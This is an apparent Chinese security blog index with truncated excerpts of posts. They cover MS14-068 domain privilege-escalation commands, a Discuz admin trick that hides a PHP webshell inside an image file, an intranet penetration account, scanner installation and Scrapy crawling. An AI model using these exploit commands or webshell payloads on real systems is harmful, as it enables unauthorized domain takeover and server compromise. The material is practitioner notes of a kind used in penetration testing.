域渗透那几个技巧

做个备份,最近用的比较多。 ms14068漏洞利用: 生成TGT: whoami /all python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com ms14068.exe -u admin@xxx....

discuz后台拿shell姿势

昨晚遇到一个站点,好久不玩discuz都不会了。 做个笔记记录一下。 1.包含文件拿shell copy 1.jpg/b+1.txt/a 2.jpg 1.txt内容为: <?php fputs(fopen('f.php','w'),'<?p...

某一功能测试脚本

帮公司测试写的一个功能测试脚本。需要尽量少用第三方库,但其实还是用到了,连接ssh必须需要用到。 # coding:utf-8 import socket import sys import os import paramiko import subprocess...

记一次内网渗透

因为一客户的关系,需要搞定几个主站,收集一波信息下来,发现有waf,防火墙。略显棘手,找了一下子域,很偶然的机会挖到了一个任意文件上传,曲线救国路线开始,运气很好,在那几个主站在同一个网段。所以很顺...

kali linux安装nessus/openvas

前几天做渗透测试,需要用到这两个工具。做个备忘。 kali linux安装openvas apt-get update apt-get upgrade apt-get dist-upgrade apt-get install openvas #挂vpn下载,不然要等...

Scrapy抓取伯乐在线文章

前面我讲了一下scrapy基础,接下来就是实战搞一下 jobbole.py 我使用的py2,需要用到Request和Response对象爬取网站,使用callback进行函数回调,获取文章信息这里直接使用ItemLoader来填...

Scrapy基础学习

做了个支线任务scrapy学习。 安装 pip3 install scrapy scrapy startproject yourproject 切换到spiders目录下面 scrapy genspider jobbole blog.jobbole.com scrapy运行 ...

用Python获取代理ip

业余学习scrapy,撸了一下反爬策略,继续怼了一波代理ip, # /usr/bin python # coding:utf-8 # author:2amor import requests from scrapy.selector import Selector import pymysql """ create ...